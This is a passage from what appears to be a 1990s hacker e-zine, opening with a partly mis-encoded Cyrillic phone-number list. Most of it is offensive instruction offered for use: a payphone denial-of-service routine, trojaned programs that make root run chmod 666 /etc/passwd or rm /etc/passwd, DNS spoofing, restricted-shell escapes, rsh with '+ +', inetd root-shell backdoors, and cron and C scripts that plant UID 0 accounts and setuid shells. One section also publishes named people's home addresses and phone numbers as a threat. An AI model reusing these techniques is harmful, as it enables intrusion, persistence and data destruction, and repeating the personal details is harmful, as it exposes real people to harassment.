  1654.     8-10 800 4977277 - éѽ¿¬«íα¿Γá¡¿∩( Mercuri);
  1655.     8-10 800 4977288 - éÑ¡úα¿∩;
  1656.     8-10 800 4977181 - ƒ»«¡¿∩ ( KDD);
  1657.     8-10 800 4974358 - ö¿¡½∩¡ñ¿∩( Telecom Finland);
  1658.     8-10 800 4977032 - üѽ∞ú¿∩ (Belgacom, calling cards);
  1659.     8-10 800 4977212 - üѽ∞ú¿∩ ( Belgacom,operator);
  1660.     8-10 800 4977039 - êΓ὿∩ (Iritel);
  1661.     8-10 800 4977353 - êα½á¡ñ¿∩ ( Telecom Iriland);
  1662.     8-10 800 4977156 - ù¿½¿;
  1663.     8-10 800 4977165 - æ¿¡úá»πα;
  1664.     8-10 800 4977141 - ÿóÑ⌐µáα¿∩.
  1665.  
  1666. ───────────────────────────────────────────────────────────────────────────────
  1667.   4. How to fuck over a UK payphone : so1o / NightRage
  1668. ───────────────────────────────────────────────────────────────────────────────
  1669.  
  1670. We found this out by total coincidence at the Bristol 2600 meeting...
  1671.  
  1672. This is a DoS (Denial of Service) attack for payphones in the UK, it uses
  1673. the national test number (175) and your local test number - at your local
  1674. excahnge, which in Bristol is 17070 (I think), so you do the following...
  1675.  
  1676.   1) Approach the telephone booth.
  1677.   2) Pick up the handset.
  1678.   3) Put 10p into the phone - you will get this back.
  1679.   4) Dial your local excahnge test number.
  1680.   5) Put the handset down.
  1681.   6) Pick the handset up.
  1682.   7) Dial your national exchange test number.
  1683.   8) Listen to all the noise and shit for about 10 seconds.
  1684.   9) Put the handset down.
  1685.  
  1686. The LCD display in the booth will now say words to the following..
  1687.  
  1688.   "BT Apologise, but this telephone is out of order."
  1689.  
  1690. About 30 seconds later, the phone will return back to normal.
  1691.  
  1692. ───────────────────────────────────────────────────────────────────────────────
  1693.   5. Radio link for TI-85 calculators : Michael Jan
  1694. ───────────────────────────────────────────────────────────────────────────────
  1695.  
  1696.   ********************************************************************
  1697.   -- INTRO -----------------------------------------------------------
  1698.   ********************************************************************
  1699.  
  1700.   RT LINK (Radio transfer link) basicly functions like a regular
  1701.   TI-LINK except it is wireless! The parts for making this link will 
  1702.   cost around $15 - $20 dollars for a pair, and the frequency is adjustable.
  1703.  
  1704.   You may post & share this plan. But please give me credit for my 
  1705.   work (at least put my name, Michael Jan).  I TESTED this plan, they transfer
  1706.   within the range of 30 to 50 feet. (Which is more than what I expected,
  1707.   great!). The following are the parts you need, you can obtain them at R.S.
  1708.             
  1709.  
  1710.   ********************************************************************
  1711.   -- PARTS -----------------------------------------------------------
  1712.   ********************************************************************
  1713.  
  1714.   PARTS           VALUE                           QUANTITY
  1715.   --------------------------------------------------------------------
  1716.  
  1717.   TI LINK         [TI BLACK LINK]                 1
  1718.   (Cut Into 2)
  1719.  
  1720.   Capacitors      [470 pF]                        2
  1721.                   [100 pF]                        2
  1722.                   [10  pF]                        2
  1723.                   [4   pF]                        4
  1724.                   [.01 uF]                        2
  1725.                   [10  uF]                        4
  1726.  
  1727.   Resistors       [10K Ohm]                       2
  1728.                   [1.2K Ohm]                      2
  1729.                   [33K Ohm]                       4
  1730.                   [100 Ohm]                       2
  1731.                   [180 Ohm]                       2
  1732.  
  1733.   Transistors     [2SC1923]                       4
  1734.  
  1735.   Coil(L)         [.27-.3]                        4
  1736.  
  1737.   Battery Holder  [Holds 2 AA or 2 AAA]           2
  1738.  
  1739.   Batteries       [AA or AAA]                     4
  1740.  
  1741.   Diode           [Germanium]                     2
  1742.  
  1743.   Copper Wire     [2 Feet]                        2
  1744.   (Ant.)
  1745.  
  1746.  *****************************************************************************
  1747.  *** NOTE The Parts Are For TWO RT LINKs, Because They ONLY WORK In PAIRS! ***
  1748.  *****************************************************************************
  1749.  
  1750.   *******************************************************************
  1751.   -- DIRECTIONS -----------------------------------------------------
  1752.   *******************************************************************
  1753.  
  1754.   1. Print Out The Schematic Diagram (The Included GIF File), It is
  1755.      Easier To Put Parts Together.
  1756.  
  1757.   2. Put The Parts Together By Following The Diagram (VERY IMPORTANT).
  1758.        *** NOTE For Schematic Diagram --
  1759.  
  1760.           Red Wire   = From TI Link
  1761.           White Wire = From TI Link
  1762.           (Copper Wire From TI Link Will Not Be Use)
  1763.  
  1764.                   R  = Resistors
  1765.                   C  = Capacitors
  1766.                   T  = Transistors
  1767.  
  1768.           Connect +, - To Battery Holder
  1769.  
  1770.   3. Adjust The 4 Coil(L)s Clockwise To MAX On Both RT Links.
  1771.      This Will Adjust The Frequences On Both LINKs To Be The Same.
  1772.      (You Can Adjust To Any Frequence You Like Between 90MHz-100MHz)
  1773.  
  1774.   4. Put 2 Batteries Into Both Holders
  1775.  
  1776.   5. THAT'S IT!!!, ENJOY YOUR RT-LINK !!!!  =)
  1777.  
  1778. ───────────────────────────────────────────────────────────────────────────────
  1779. ===============================================================================
  1780. ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
  1781. ===============================================================================
  1782. ───────────────────────────────────────────────────────────────────────────────
  1783.   1. More sIn inf0z : The CodeZero + Friends
  1784. ───────────────────────────────────────────────────────────────────────────────
  1785.  
  1786.                 sIn are 0fficially property of the CodeZero.
  1787.  
  1788. -------------------------------------------------------------------------------
  1789.  
  1790.  Alias      :  Evil Chick
  1791.  Real Name  :  Suzette Kimminau
  1792.  Address    :  130 105th Ave. S.E. Apt. 218
  1793.                Bellevue, Wa 98004
  1794.                USA
  1795.  
  1796.  Telephone  :  (206)454-7176
  1797.  Email      :  evilchic@NWLINK.COM
  1798.  
  1799. -------------------------------------------------------------------------------
  1800.  
  1801.  Alias      :  \\StOrM\\
  1802.  Real Name  :  Jason Sloderbeck
  1803.  Address    :  5739 N Norton,
  1804.                Kansas City, MO 64119
  1805.                USA
  1806.  
  1807.  Telephone  :  (816)453-8722
  1808.  Email      :  storm@SINNERZ.COM
  1809.  
  1810. -------------------------------------------------------------------------------
  1811.  
  1812.  Alias      :  JDKane
  1813.  Real Name  :  Kim
  1814.  Address    :  327 E Park Road,
  1815.                Round Lake, IL 60073
  1816.                USA
  1817.  
  1818.  Telephone  :  (847)546-9154
  1819.  Email      :  
  1820.  
  1821. -------------------------------------------------------------------------------
  1822.  
  1823.  Alias      :  JeNnYGrRl
  1824.  Real Name  :  Jennifer Chambers
  1825.  Address    :  
  1826.                Kansas City, MO 61421
  1827.                USA
  1828.  
  1829.  Telephone  :  
  1830.  Email      :  
  1831.  
  1832. -------------------------------------------------------------------------------
  1833.  
  1834.                          We got more, but not complete,
  1835.  
  1836.                       They can run, but they can never hide,
  1837.     
  1838.                          http://www.codez.com/inf0z.html
  1839.  
  1840. ───────────────────────────────────────────────────────────────────────────────
  1841.   2. Rooting From Bin : so1o
  1842. ───────────────────────────────────────────────────────────────────────────────
  1843.  
  1844. This is something I was thinking alot about the other day, I was on a System V
  1845. Release 4, I had just performed the chkperm exploit, which only gives
  1846. bin access (uid=1 and gid=1) to the system, so even though I own all the
  1847. files in the /bin/ directory, I am still not root. Here is a very very simple
  1848. technique I developed for such occasions, this may come in useful one day for
  1849. someone, somewhere...
  1850.  
  1851. Write a program that you can get people to run, you could get hold of the
  1852. source for a common program, such as su or who or mount. Put this line in
  1853. it somewhere:
  1854.  
  1855. if ( !strcmp(getlogin(),"root") ) system("whatever you want");
  1856.  
  1857. This checks to see if the root login is running your program.  If he is, you
  1858. can have him execute any shell command you'd like.  Here are some suggestions:
  1859.  
  1860. "chmod 666 /etc/passwd"
  1861.  
  1862. /etc/passwd is the system's password file.  The root owns this file.
  1863. Normally, everyone can read it (the passwords are encrypted) but only the root
  1864. can write to it.  Take a look at it and see how it's formatted if you don't
  1865. know already.  This command makes it possible for you to now write to the file
  1866.  
  1867. - i.e. create unlimited accounts for yourself and your friends.
  1868.  
  1869. "chmod 666 /etc/group"
  1870.  
  1871. By adding yourelf to some high-access groups, you can open many doors.
  1872.  
  1873. "chmod 666 /usr/lib/uucp/L.sys"
  1874.  
  1875. Look for this file on your system if it is on the uucp net.  It contains
  1876. dialups and passwords to other systems on the net, and normally only the uucp
  1877. administrator can read it.  Find out who owns this file and get him to
  1878. unknowingly execute a program to unlock it for you.
  1879.  
  1880. "rm /etc/passwd"
  1881.  
  1882. If you can get the root to execute this command, the system's passwd file
  1883. will be removed and the system will go down and will not come up for some time
  1884. to come.  This is very destructive and evil, but pointless, if you do want to
  1885. damage a system, at least use your imagination.
  1886.  
  1887. If you are going to go about adding a trojan horse program to the system,
  1888. there are some rules you should follow.  If the hidden purpose is something
  1889. major (such as unlocking the user's mbox or deleting all of his files or
  1890. something) this program shouldn't be a program that people will be running a
  1891. lot (such as a popular computer game) - once people discover that their files
  1892. are public access the source of the problem will be discovered quite easily.
  1893. Save this purpose for a 'test' program (such as a game you're in the process
  1894. of writing) that you ask individual people to run via mail or 'chatting' with
  1895. them.  As I said, this 'test' program can bomb or print a phony error message
  1896. after completing its task, and you will just tell the person "well, I guess
  1897. it needs more work", wait until they log off, and then read whatever file of
  1898. theirs that you've unlocked.  If your trojan horse program's sole purpose is
  1899. to catch a specific user running it - such as the root or other high-powered
  1900. user - you can put the code to do so in a program that will be run a lot by
  1901. various users of the system.  Your modification will remain dormant until he
  1902. runs it.  If you cant find the source to 'star trek' or whatever in C, just
  1903. learn C and convert something from pascal.  It can't hurt to learn C as it's a
  1904. great language.  We've just seen what it can do on a UNIX system.  Once you've
  1905. caught the root (i.e. you can now modify the /etc/passwd file) remove the
  1906. spurious code from your trojan horse program and you'll never be caught.
  1907.  
  1908. so1o.
  1909.  
  1910. ───────────────────────────────────────────────────────────────────────────────
  1911.   3. DNS Spoofing : so1o
  1912. ───────────────────────────────────────────────────────────────────────────────
  1913.  
  1914. You can now use a new DNS spoofing technique originally developed by johan,
  1915. I have seen this technique often applied to IRC, and prym was one of the first
  1916. to use the technique for that purpose.
  1917.  
  1918. Here is a basic introduction into the DNS concept.
  1919. --------------------------------------------------
  1920.  
  1921. DNS stands for Domain Name Server although you may hear it refered to as
  1922. Dynamic Name Server. DNS servers are used so that instead of everyone having
  1923. numeric IP's for their websites and shit, they can use a DNS so that a client
  1924. can 'lookup' the name (eatme.com for example) to the numeric IP.
  1925.  
  1926. Basically, a DNS server is a computer which is running a nameserver daemon
  1927. typically listening on UDP port 53. When a new domain is setup the domain is
  1928. registered with Internic. Internic then tells its clients who has authority
  1929. over the domains registered with it.
  1930.  
  1931. For example say 1.2.3.4 wanted to resolve the address for peachie.com and
  1932. 1.2.3.4's nameserver was 1.3.3.7. 1.2.3.4 would ask 1.3.3.7 what the numeric
  1933. IP for peachie.com was, so 1.3.3.7 would ask internic who had authority over
  1934. peachie.com and internic might reply with ns.peachie.com. So then 1.3.3.7
  1935. would ask ns.peachie.com what the numeric IP for peachie.com was.
  1936. Then ns.peachie.com would tell 1.3.3.7 that the numeric IP for peachie.com
  1937. was 4.3.2.1 and then 1.3.3.7 would then tell 1.2.3.4 the numeric IP and the
  1938. name would be resolved.
  1939.  
  1940. DNS servers generally cache addresses that are looked up by its clients.
  1941. So if 1.2.3.4 were to ask 1.3.3.7 what the address for taco.com was again,
  1942. 1.3.3.7 would not ask Internic etc. instead it would take the IP that it had
  1943. previously resolved earlier and say that the numeric IP for peachie.com is
  1944. 4.3.2.1. the funny part is that the DNS server doesn't do alot of checking
  1945. when another nameserver replies to its query. It basically just tells the
  1946. client what is was told at an earlier point and caches it in the same way.
  1947. This is why we can spoof using such a technique, but we would need root
  1948. access to a nameserver first, this is one of the biggest setbacks...
  1949.  
  1950. How to spoof your DNS.
  1951. ----------------------
  1952.  
  1953. Lets say were sitting on ns.peachie.com with root, and we have authority
  1954. for all of peachie.com. we want to cache our boxs address 2.2.2.2 on the
  1955. remote nameserver ns.eatme.org so that we can connect to eatme.org with the
  1956. address of trusted.eatme.org. We could write a program that listens for DNS
  1957. queries and replies with false information. sitting on ns.peachie.com we
  1958. could lookup peachie.com on the nameserver ns.eatme.org. ns.eatme.org would
  1959. ask Internic who had authority for peachie.com and it would reply to
  1960. ns.eatme.org that ns.peachie.com had authority over peachie.com. Then
  1961. ns.eatme.org would ask ns.peachie.com what the address for peachie.com was.
  1962.  
  1963. If we were running a normal DNS then it would tell ns.eatme.org that the
  1964. address for peachie.com was 4.3.2.1. but we aren't. We'll say that
  1965. ns.peachie.com tells ns.eatme.org that the reverse of 2.2.2.2 is
  1966. trusted.peachie.com and the address for trusted.peachie.com is 2.2.2.2.
  1967. This exploits the failure to check a few things on the DNS.
  1968.  
  1969. Basically ns.eatme.org asked what the numeric IP for peachie.com was and we
  1970. told it that the reverse of 2.2.2.2 is trusted.eatme.org and that the IP
  1971. of trusted.eatme.org is 2.2.2.2. They asked a question to which we responded
  1972. with two awnsers to different question entirely. Now we would simply connect
  1973. to eatme.org from 2.2.2.2 and eatme.org would ask ns.eatme.org for the reverse
  1974. of 2.2.2.2 and in its cache it would find trusted.eatme.org and it would reply
  1975. with that answer. Then it would ask for the address of trusted.eatme.org and
  1976. it would reply with 2.2.2.2. you would then be connected to eatme.org
  1977. from trusted.eatme.org and in effect DNS spoofing.
  1978.  
  1979. That's all there is to it, it may be a bit heavy for some people.
  1980.  
  1981. so1o.
  1982.  
  1983. ───────────────────────────────────────────────────────────────────────────────
  1984.   4. FreeNet : TrN
  1985. ───────────────────────────────────────────────────────────────────────────────
  1986.  
  1987. Breaking security on restricted shells and freenets.
  1988.  
  1989. What many system administrators fail to realize is that by setting up shells
  1990. and security on their applications and systems, and generally trying to lock
  1991. users in a freenet menu environment, it is almost impossible to fully examine
  1992. every program. Many programs allow you to escape to shells, even in secure mode,
  1993. especially the older ones. There is a longstanding bug in the gohper
  1994. application, used by many freenets, that allows you to start up a gopher server,
  1995. where an entry is created such as ";sh". Following this entry provides a shell.
  1996. This is the main reason why the original gopher client is no longer in use.
  1997. A "l;rm -rf *" was just as easy.
  1998.  
  1999. In todays world, the biggest problem is that freenets usually allow you to edit
  2000. files. If this is the case, you almost have a 100% chance of you getting into
  2001. a real shell. What you first have to do is see if you can go through the menu
  2002. system to edit a file. If you can't that is cool too.  We are going to show you
  2003. how to get a shell out of PINE. It doesn't matter which version, this works all
  2004. the way up to 3.96. Anyway, like I was saying, you should see if you can either
  2005. a) edit a file, or b) upload a file. I'm almost sure you can do either.
  2006. So, lets start a little session here. First, you have to edit your .pinerc.
  2007. If you can't, download it (or get it from the PINE  package), make the changes,
  2008. and reupload it. What is important is that you edit the feature-list=commands,
  2009. and have it read something similar to this:
  2010.  
  2011. feature-list=enable-alternate-editor-cmd,
  2012.              enable-unix-pipe-cmd
  2013.  
  2014. After setting this correctly, go further in the file, and until you find the
  2015. editor= command. It is stated that the editor is normally set to sh, and
  2016. invoked via _^ [Control-Shift-Dash]. Do you get the idea yet?
  2017. Set the line to read editor=sh and then save the file. Now for the fun part.
  2018. Start up pine, and chose Compose Message. Erase all the To/Cc/Att/Sub headers,
  2019. and make the message text blank, except for the work "sh" (without the quotes)
  2020. on a single line. After this is done, press the alternate editor hotkey (^_).
  2021. Here is what happens:
  2022.  
  2023. To      :
  2024. Cc      :
  2025. Attchmnt:
  2026. Subject :
  2027. ----- Message Text -----
  2028. sh
  2029. $                
  2030.  
  2031. Kinda neat. That little $ is the sign that it all worked. What you probably
  2032. want to do is execute some of the standard commands that tell you a little
  2033. about where you are:
  2034.  
  2035. $ uname -a ; uptime ; /sbin/ifconfig -a
  2036. SunOS pb 4.1.3_U1 1 sun4m
  2037. 12:14am up 47 days, 12:18, 24 users, load average: 2.71
  2038. le0: flags=63<UP,BROADCAST,NOTRAILERS,RUNNING> 
  2039.      inet 199.227.192.35 ffffff00 199.227.192.0
  2040. lo0: flags=49<UP,LOOPBACK,RUNNING> 
  2041.      inet 127.0.0.1 ff000000
  2042.  
  2043. Then a w ; ps -aux would be nice. It can tell you a little about what is going
  2044. on, and what is safe to do the things you want. You should probably log on
  2045. late at night, compile slirp if it is only a shell/vt dialin, and then check
  2046. the system for vunerabilities, unshadowed passwords, etc. I've notified my
  2047. freenet of their problems, but they don't seem to care. Maybe now they will.
  2048. Ok  sysadmins,  fix  up  your freenets, and hackers... Hack the planet. :-)
  2049.  
  2050. This  article  by  TrN  of The CodeZero. I'll have more interesting information
  2051. on the way. You can get ahold of me at http://bluebox.dyn.ml.org:8000, or by
  2052. e-mail at p033644b@pbfreenet.seflin.lib.fl.us. You should check out the web
  2053. page, as it has other security related information. LaterZ.
  2054.  
  2055.   One other thing to consider, if ports 514 / 512 are open, then you can try
  2056.   creating an .rhosts file in your home directory containing "+ +", then use..
  2057.  
  2058.   rsh -l loginhere systemhere.com csh -i
  2059.  
  2060.   ...and you will get a shell -- so1o.
  2061.  
  2062. ───────────────────────────────────────────────────────────────────────────────
  2063.   5. Backdoors Revised : Blk-Majik
  2064. ───────────────────────────────────────────────────────────────────────────────
  2065.  
  2066. Disclamer:
  2067.  
  2068. If you do anything mentioned in this article, it is your own fault and any
  2069. trouble you manage to get into is your own responsibility, not mine.
  2070. But what am I thinking...like any of you lamers can root a shell :).
  2071.  
  2072. gr33tz:
  2073.  
  2074. A big wuzzup to cf, oK, oa, and gZ!  Keep it kewl, madmax, imunknown, pack,
  2075. plum, mogle, crytpo`, so1o, c0d, and da rest of muh boys! Thanx to mcooly for
  2076. making this document possible and helping me out!
  2077.  
  2078. =============================================================================
  2079.   section 1:
  2080. =============================================================================
  2081.  
  2082. What is a back door? :
  2083.  
  2084. Well, kiddies, a backdoor is just a way to remotely get into a shell without
  2085. being noticed or sometimes logged. This can be done by adding a extra telnet
  2086. port to the server I will show you a few ways to set up the port, and also
  2087. how to keep it up even after the admin find it.
  2088. so1o had a section in a back issue with a back door using the inetd.conf
  2089. file where you had to end all commands with a ";".  Well that annoyed the
  2090. hell out of me so I have modified his technique.
  2091.  
  2092. =============================================================================
  2093.   section 2:
  2094. =============================================================================
  2095.  
  2096. What you need :
  2097.  
  2098. Basically, you need root on a shell to start (and a Unix based OS).
  2099. After that, you will need a good editor....say pico or vi. Most of you
  2100. #shells wh0res need, but lack this important ingredient....a fucking brain.
  2101.  
  2102. =============================================================================
  2103.   section 3:
  2104. =============================================================================
  2105.  
  2106. Understanding the technique :
  2107.  
  2108. After you checked your head, editor, whoami, etc, you are all set. Ok, this
  2109. is what you look for:
  2110.  
  2111. /etc/services      This file lets you find a port
  2112. /ect/inetd.conf    This is where the backdoor will be
  2113.  
  2114. ok, in the /etc/services file, you will see something like this:
  2115.  
  2116. tcpmux            1/tcp    #TCP Port Service Multiplexer
  2117. tcpmux            1/udp    #TCP Port Service Multiplexer
  2118. compressnet       2/tcp    #Management Utility
  2119. compressnet       2/udp    #Management Utility
  2120. compressnet       3/tcp    #Compression Process
  2121. compressnet       3/udp    #Compression Process
  2122.  
  2123. ok, what the fuck is that? ill explain it with this example:
  2124.  
  2125. ftp              21/tcp    #File Transfer [Control]
  2126. ftp              21/udp    #File Transfer [Control]
  2127.  
  2128. [1]             [2]/[3]    #[         4           ]
  2129.  
  2130.   1: The name of the service of the system.
  2131.   2: The port that the system uses for the service.
  2132.   3: The protocol (going to be tcp. You can chose either tcp or udp.)
  2133.   4: A description of what the service is used for.
  2134.  
  2135. Aight, thats the service file...you will need this later.
  2136.  
  2137. now look at the /etc/inetd.conf file. the inetd is a Internet daemon that
  2138. will listen for tcp requests and UDP prots and then spaws the program when a
  2139. connection request is made.
  2140.  
  2141. It will look like this:
  2142.  
  2143. ftp     stream  tcp     nowait  root    /usr/libexec/tcpd       ftpd -l -A
  2144. telnet  stream  tcp     nowait  root    /usr/libexec/tcpd       telnetd
  2145. shell   stream  tcp     nowait  root    /usr/libexec/tcpd       rshd
  2146. login   stream  tcp     nowait  root    /usr/libexec/tcpd       rlogind -a
  2147. exec    stream  tcp     nowait  root    /usr/libexec/tcpd       rexecd
  2148.  
  2149. let me explain it:
  2150.  
  2151. ftp     stream  tcp     nowait  root    /usr/libexec/tcpd       ftpd -l -A
  2152. [1]     [  2  ] [3]     [  4 ]  [ 5 ]   [      6         ]      [    7    ]
  2153.  
  2154.   1: Name of deamon in the services file. It tells inetd what to look for in
  2155.      /etc/services to see what port to use when connecting.
  2156.   2: Type of of socket connection that the deamon will accept.
  2157.   3: Protocol field which is always TCP or UDP.
  2158.   4: How long to delay connection.
  2159.   5: User to run on the deamon as (used with uid/gid permissions etc.)
  2160.   6: What program will keep the connection.
  2161.   7: The actual command or daemon.
  2162.  
  2163. Ok, so what that dose it makes a port for telnet (port 21, as defined in the
  2164. services file). It has a stream/tcp connection and dosn't wait for a prompt.
  2165. The user is of root access and uses /ur/libexec/tcpd (but limited commands)
  2166.                                                   
  2167. Ok, now u know what the shit is for, next step...
  2168.  
  2169. =============================================================================
  2170.   section 4:
  2171. =============================================================================
  2172.  
  2173. Installing the backdoor :
  2174.  
  2175. Backdoor I : Using /etc/inetd.conf and /etc/services
  2176. ----------------------------------------------------
  2177.  
  2178. method 1 :
  2179. ----------
  2180.  
  2181. ok, now go back to the /etc/services file. Look at it and find a service you
  2182. think the admin will not notice, and that is not in use. remember the name
  2183. of the service.  Now, go to the inetd.conf file. Go to a place with all the
  2184. services name where the 1 is in the above example. Add you service somewhere
  2185. so it is hidden within others. For 2, put the port of the service. 3 is tcp,
  2186. duh. 4 is nowait. 5 will be root, so u get root access. 6 is going to be
  2187. /bin/sh or what ever you like. 7 has to be 6 -i..ex: if 7 is /bin/sh,
  2188. 7 is /bin/sh -i
  2189.  
  2190. here is an example:
  2191.  
  2192. ftp     stream  tcp     nowait  root  /bin/sh     sh -i
  2193.  
  2194. Ok, now you have to restart the inetd. do this by typing (as root) :
  2195.  
  2196. killall -HUP inetd
  2197.  
  2198. Ok, now lets test it. From a different system...
  2199.  
  2200. telnet victum.server.com 21
  2201. Trying 123.456.78.9...
  2202. Connected to comp.com
  2203. Escape character is '^]'.
  2204. bash#
  2205. bash# whoami
  2206. root
  2207. bash#
  2208.  
  2209. tip:
  2210.  
  2211. do NOT use the ftp port...it is just used to often. Pick a service that is
  2212. not use alot.  It will help you keep the backdoor running.
  2213.  
  2214. method 2:
  2215. ---------
  2216.  
  2217. If you are willing, you can add your own service to the service file.
  2218. This is easy..say you service file is like this:
  2219.  
  2220. netbios-ssn     139/tcp         nbssn
  2221. imap            143/tcp                         # imap network mail protocol
  2222. NeWS            144/tcp         news            # Window System
  2223. snmp            161/udp
  2224.  
  2225. ok, look at the ports.....see how they skip a few?  well lets fill 1 of them
  2226. up...
  2227.  
  2228. netbios-ssn     139/tcp         nbssn
  2229. suled           142/tcp         suled     
  2230. imap            143/tcp                         # imap network mail protocol
  2231. NeWS            144/tcp         news            # Window System
  2232. snmp            161/udp
  2233.  
  2234. Notice the suled service...that I added that to the /etc/services.
  2235.  
  2236. Ok, now to the /etc/inetd.conf file:
  2237.  
  2238. ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
  2239. telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
  2240. gopher  stream  tcp     nowait  root    /usr/sbin/tcpd  gn
  2241.  
  2242. ...Here we go!!
  2243.  
  2244. ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
  2245. telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
  2246. gopher  stream  tcp     nowait  root    /usr/sbin/tcpd  gn
  2247. suled   stream  tcp     nowait  root    /bin/sh         sh -i
  2248.  
  2249. Ok, now restart inetd like i said how to before...
  2250.  
  2251. You're all set, telnet localhost <port u set> and test it!@~#
  2252.  
  2253. Backdoor II: Da beauty of CRON
  2254. -------------------------------
  2255.  
  2256. Ok, cron trojans are good for keeping root if the admin kills the backdoor.
  2257. A Cron is a timed daemon. It consits of hours, minutes, etc. It will make the
  2258. system automatically issue a command on the shell at a given time of your
  2259. choice...  Type crontab in the shell. It will tell you how to list, run and
  2260. remove crons. You will like to look at the /var/spool/cron/crontabs/root.
  2261. This is what the crons will look like:
  2262.  
  2263.  0       0       *       *       1       /usr/bin/updatedb
  2264. [1]     [2]     [3]     [4]     [5]     [       6         ]
  2265.  
  2266.   1: munute, 0-59
  2267.   2: hour, 0-23
  2268.   3: day of month, 1-31
  2269.   4: month of yeat, 1-12
  2270.   5: day of week, 0-6
  2271.   6: command to execute
  2272.  
  2273. The example above is issued on monday's. If you want to exploit the cron,
  2274. simply add an cron line to the /var/spool/crontab/root.
  2275.  
  2276. ie: If you use the UID 0 account (as seen later), you can make a cron to
  2277.     see if the UID 0 account is still alive. If root killed it, the cron can
  2278.     re-add it!
  2279.  
  2280. ...This will make the UID 0 account, just for back-up:
  2281.  
  2282. Cron #1
  2283. -------
  2284.  
  2285. newuser.sh
  2286. ----------
  2287.  
  2288. #!/bin/sh
  2289. # Inserts a UID 0 account into the middle of the passwd file.
  2290. # There is likely a way to do this in 1/2 a line of AWK or SED.  Oh well.
  2291. # daemon9@netcom.com
  2292.  
  2293. set linecount = `wc -l /etc/passwd`
  2294. cd                                              # Do this at home.
  2295. cp /etc/passwd ./temppass                       # Safety first.
  2296. echo passwd file has $linecount[1] lines.
  2297. @ linecount[1] /= 2
  2298. @ linecount[1] += 1                             # we only want 2 temp files
  2299. echo Creating two files, $linecount[1] lines each \(or approximately that\).
  2300. split -$linecount[1] ./temppass                 # passwd string optional
  2301. echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
  2302. cat ./xab >> ./xaa
  2303. mv ./xaa /etc/passwd
  2304. chmod 644 /etc/passwd                           # or whatever it was beforehand
  2305. rm ./xa* ./temppass
  2306. echo Done...
  2307.  
  2308.  
  2309. *** NOTE : MODIFY THE ECHO "YOURUSER..." PART!!
  2310.  
  2311. Here is a script that kinda does the same thing, but instead of making a new
  2312. account, it will look for an old, disabled account and enable it just for you :
  2313.  
  2314.  
  2315. dead.sh
  2316. -------
  2317.  
  2318. #!/bin/sh
  2319. # Everyone's favorite...
  2320.  
  2321. cp /bin/csh /tmp/.yourlittleshell      # Don't name it that...
  2322. chmod 4755 /tmp/.yourlittleshell
  2323.  
  2324. Ok, here is where the cron comes in. It will look in the passwd files to
  2325. check if you YouUser is still alive. If not, it brings him back!
  2326.  
  2327. revive.sh
  2328. ---------
  2329.  
  2330. #!/bin/sh
  2331. #Is YourUser still on the system?  Let's make sure he is.
  2332. #daemon9@netcom.com
  2333.  
  2334. set evilflag = (`grep eviluser /etc/passwd`)
  2335.  
  2336.  
  2337. if($#evilflag == 0) then                                # Is he there?
  2338.  
  2339.                set linecount = `wc -l /etc/passwd`
  2340.                 cd                                      # Do this at home.
  2341.                 cp /etc/passwd ./temppass               # Safety first.
  2342.                 @ linecount[1] /= 2
  2343.                 @ linecount[1] += 1                     # we only want 2 temp files
  2344.                 split -$linecount[1] ./temppass         # passwd string option
  2345.                 echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
  2346.                 cat ./xab >> ./xaa
  2347.                 mv ./xaa /etc/passwd
  2348.                 chmod 644 /etc/passwd                   # or whatever it was beforehand
  2349.                 rm ./xa* ./temppass
  2350.                 echo Done...
  2351. else
  2352. endif
  2353.  
  2354.  
  2355. cron #2
  2356. -------
  2357.  
  2358. First of all, you will need a copy of the /etc/passwd file in a hidden
  2359. location.  For this example, we will use /var/spool/mail/.hidepass.  We have
  2360. one entry in it that will be are root account we will use. Then lets make a
  2361. cron that will save a copy of the real /etc/passwd file and install the hidden
  2362. passwd file as the real one for 1 minute at a time of your choice.  Make it
  2363. at a slow time of day because any one who tries to access the passwd file
  2364. durring this minute will get an error. 4:30 am is a good time. Put this in
  2365. the roots cron to do this :
  2366.  
  2367.         29      4       *       *       *       /bin/usr/hidenhidenpass
  2368.  
  2369. ..make sure this exist
  2370.  
  2371. #echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidden
  2372.  
  2373. here is the /bin/usr/hidenhidenpass
  2374.  
  2375. .hidden
  2376. -------
  2377.  
  2378. #!/bin/sh
  2379. # Install trojan /etc/passwd file for one minute
  2380. #daemon9@netcom.com
  2381. cp /etc/passwd /etc/.temppass
  2382. cp /var/spool/mail/.sneaky /etc/passwd
  2383. sleep 60
  2384. mv /etc/.temppass /etc/passwd
  2385.  
  2386.  
  2387. Cron #3
  2388. --------
  2389.  
  2390. This is a c script that will work like the above.  Cron it as root like as
  2391. above and just let this file load every day.
  2392.  
  2393. hidden.c
  2394. --------
  2395.  
  2396. #include<stdio.h>
  2397.  
  2398. #define KEYWORD "industry3"
  2399. #define BUFFERSIZE 10
  2400.  
  2401. int main(argc, argv)
  2402. int argc;
  2403. char *argv[];{
  2404.  
  2405.         int i=0;
  2406.  
  2407.         if(argv[1]){            /* we've got an argument, is it the keyword? */
  2408.  
  2409.                 if(!(strcmp(KEYWORD,argv[1]))){
  2410.  
  2411.                                 /* This is the trojan part. */
  2412.                         system("cp /bin/csh /bin/.swp121");
  2413.                         system("chown root /bin/.swp121");
  2414.                         system("chmod 4755 /bin/.swp121");
  2415.                 }
  2416.  
  2417.         }
  2418.                                 /* Put your possibly system specific trojan
  2419.                                    messages here */
  2420.                                 /* Let's look like we're doing something... */
  2421.         printf("Sychronizing bitmap image records.");
  2422.         /* system("ls -alR / >& /dev/null > /dev/null&"); */
  2423.         for(;i<10;i++){
  2424.                 fprintf(stderr,".");
  2425.                 sleep(1);
  2426.         }
  2427.         printf("\nDone.\n");
  2428.         return(0);
  2429. } /* End main */
  2430.  
  2431.  
  2432. =============================================================================
  2433.   section 5:
  2434. =============================================================================
  2435.  
  2436. Sendmail backdoor :
  2437. -------------------
  2438.  
  2439. With this, you have to edit the /etc/aliases file. add this line:
  2440.  
  2441. decode: |/usr/bin/uudecode
  2442.  
  2443. make sure u hide it in their so it aint odvious :).  the uudecode file will
